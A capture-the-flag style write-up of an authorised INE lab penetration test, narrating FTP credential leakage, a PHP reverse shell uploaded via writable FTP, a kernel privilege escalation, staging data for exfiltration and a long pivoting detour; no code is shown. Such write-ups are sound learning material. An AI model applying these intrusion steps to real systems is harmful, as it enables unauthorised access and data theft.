Special Thanks to:

INE            Legacyy

 

Introduction

 

Hello Friends! Welcome back; today we have been contracted by INE to perform an assessment of their network. As INE desired a blackbox test, 7R!XxSec was provided with very little information going in. The engagement letter stated as follows:

“You have been engaged in a Black-box Penetration Test (172.16.37.0/24 range). Your goal is to read the flag file on each machine. On some of them, you will be required to exploit a remote code execution vulnerability in order to read the flag”

And as such, we entered into the engagement with the following assumptions:

• There are multiple machines on the network
• Full control is not the aim, success is the capturing of the flag

 

Attack Narrative

 

Beginning with a network scan, we discovered two machines with attack surfaces.

 

Let's grab a port scan from 220

 

 

Okay, a webserver and a port which is blocking our attempts to identify it, although its numerical designation would suggest it is a SQL server. Heading out to the website we find nothing, but a source code check reveals some useful network information which indicates that this machine is dual-homed, meaning there is an internal network we do not yet have visibility on.

 

 

Dirsearching on the root reveals a subdirectory, but access to it is forbidden.

 

 

Some Searchsploiting reveals that there is a potential Optionsbleed vulnerability to attack the Apache service with, but a Metasploit Optionsbleed Scanner reveals that the conditions for this exploit are not in place. Seems like we are at a dead end on this machine. Let’s go take a peek at the other machine we found in our host scan.

 

 

Looks like we have a second webserver, and also an FTP server! I love a good exposed FTP server ./fistpump but let’s take a look at the website first.

Nothing on the index page, but a Dirsearch reveals an exposed subdirectory, which itself reveals what appears to be an ifconfig command being executed.

 

Other than this there is not much else to play with here, let’s go back and check out that FTP server.

Immediate win here: after a couple oblivious attempts, the message finally becomes clear, the FTP banner gives both the username and password to access this service.

 

 

Some light enumeration reveals a delicious secret, the PHP index page for the machine’s webserver is being served via this FTP server. Furthermore, we have full 777 access to the directory containing this file.

 

 

This is very good for us if it is what we think it is. Let’s run a quick test to make sure it is. We’ll copy this index.php file, replace the command it calls, replace the FTP version with our version, and go call the webpage to see if it calls our new command.

 

 

Alright! Rock on dudes! Let’s bust into this thing! We can find a PHP Reverse Shell here which we will customize to our environment, call it index.php, insert in place on the FTP server, and then catch the webpage refresh with a NetCat listener!

 

 

It is a fairly trash shell, but I discovered a super cool and convenient shell upgrade thanks to ropnop’s blog, here.

 

 

Initial enumeration uncovers a very obviously interesting directory structure in elsuser’s profile:

 

 

A few nested directories down we can see there is a file called ‘.message’,

 

 

which we can assume has something to do with this exploit.

Moving along, let’s snag root, it is a very simple kernel exploit that can be found here and all we did was download it, compile it, move it onto the machine in the tmp directory and call the script.

 

 

With that root access, we can grab the flag in a hidden file among ftpuser’s directory

 

 

which happens to not contain anything? Weird? A little more digging turns up an actual flag in /var/www

 

 

Further leveraging our administrative access we can see the bash history now, and among it:

 

 

What we see here is the developer setting up and testing the environment.. He/she was wanting to make sure that nmap could reach this internal network on these specific ports, so it would be convenient to assume that we can just copy paste this Nmap command rather than scanning everything. Scanning everything would still be best practice, but in this particular environment I would feel safe going with the assumption. Conveniently, also, the developer did not uninstall Nmap, so we can use the present installation rather than the static copy we happened to bring over with our toolset. So using the developer’s command with the developer’s tool we discover the following:

 

 

Before we make a move here, let’s talk exfiltration quickly. This machine is setup beautifully for exfil, and there are multiple methods of retrieving whatever data we harvest in a very simple way. Cast ‘mkdir loot’ wherever you like, harvest data and pipe it into this directory. Whenever you’re ready, simply move the directory into /var/www/html/xyz; now hop back onto the attack machine and either pull this dir down via the FTP server or else through the web browser:

 

 

The object shown in the picture is some FTP source code that may be more interesting if we were more stuck than we are, but as we have rooted this box this is fairly irrelevant at this point.

Now, a quick aside. This is a prime example of the frustration and redundancy of hacking... Perhaps moreso learning to hacking than hacking itself... Regardless, when reading the instructions for this engagement it clearly described an internal network, and also suggested that a pivot would be required. When running through here I decided to trust those instructions, and I wallowed in the mud for literally a week of trying to pivot into a deeper set of machines. Now it’s not that there isn’t an internal network, and it not that a pivot can’t be used, so it’s not exactly like they lied about it all. The only thing is that my expectations of a pivot is that there would be more machines.. And I thought I had found them! I will also point out that this is as much due to my lack of experience as it is due to my higher expectations coming in, but I went for a week (a couple hours a day) bouncing back and forth between four machines, wondering just #wtf was going on here, because I was finding my own relics in novel machines, and some had strikingly similar directory structures to others, and most of the time I was ‘ip a’ing between every command because I was so confused which box I was even in anymore! Now this week of ./flailing was not pointless, it taught me a great deal of lessons to add to my repertoire of initial enumeration, and I will now more readily be able to identify a similar situation in the future. To share a bit of my mental process I’ll share a few pictures here before I explain and we perform the final few commands for this network.

I had been visually mapping the network from the first scan, and it looked like:

 

 

Then the internal network was discovered

 

 

Then more internal network

 

 

and this is where the roadblock occured. I spent six days sitting on 172.16.34.234, trying to pivot onto 172.16.50.224. I tried a Metasploit pivot, a Chisel pivot, a browser proxy pivot, an Sshuttle pivot (though spent most of my time trying to load static SSH services onto the machine ./sigh), and then a Metasploit pivot again! Something just wasn’t quite right. So after six days of this frustration I pivoted my attention to the other discovered internal box, got into it, and was even more confused!

 

 

#blessings to Legacyy here because although the real answer was not as advanced as his thoughts, his thoughts nonetheless were the first indication I’d had in a week that I may not be a complete bumbling moron.

It was shortly after this exchange that I discovered the true truth:

 

 

Both external boxes were dual-homed to the internal network, and that’s all there was here. So in a classic 7R!XxSec moment I realized that the six days I spent trying to hop from 172.16.37.234 onto 172.16.50.224 was actually six days of me trying to log into a box from a position of already being root on itself.

 

 

End aside.

So here we are, sitting in the dual-homed ‘machine one’ and looking to get into the dual-homed ‘machine two’, of which the external facing IP was a brick-wall of a website (this is the very first machine we enumerated), but of which we now have access to through its internal side. Now pay close attention, because this exploit is about to get pretty wild:

 

 

Blam! Nailed it! Great work team! That is that in this network. After hitting here, still under the assumption that there were additional machines which were purely internal I did run some scans to check it out, but nothing came up, so #straightWins.

Thanks for hanging out with me today, and I look forward to our next adventure together!

 

 

Happy Hacking,

 

 

7R!Xx